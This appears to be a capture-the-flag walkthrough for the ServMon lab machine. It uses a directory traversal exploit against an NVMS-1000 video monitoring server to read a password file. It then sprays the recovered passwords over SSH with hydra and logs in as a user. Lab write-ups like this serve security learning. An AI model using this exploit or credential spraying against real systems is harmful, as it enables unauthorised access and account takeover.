3 :80 NVMS

http://servmon.htb > http://servmon.htb/Pages/login.htm
NVMS-1000 login page
 | network video monitoring system
 
Using https://www.exploit-db.com/exploits/48311
# didn't work

Using https://github.com/AleDiBen/NVMS1000-Exploit/blob/master/nvms.py
$ python3 nvms.py 10.10.10.184 Windows/system.ini win.ini
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content

# works,
# time to read C:\Users\Nathan\Desktop\Passwords.txt
$ python3 nvms.py 10.10.10.184 Users/Nathan/Desktop/Passwords.txt nathan-pass.txt
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content

++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++  END  ++++++++++

# time to spray these passwords

$ cat users
nathan
nadine
admin 

# we have ssh, smb

$ hydra -L users -P nathan-pass.txt ssh://10.10.10.184 -t 4 -s 22
[22][ssh] host: 10.10.10.184   login: nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found

$ ssh nadine@10.10.10.184

nadine@SERVMON C:\Users\Nadine>whoami
servmon\nadine

nadine@SERVMON C:\Users\Nadine>whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled

nadine@SERVMON C:\Users\Nadine>systeminfo
ERROR: Access denied

Last updated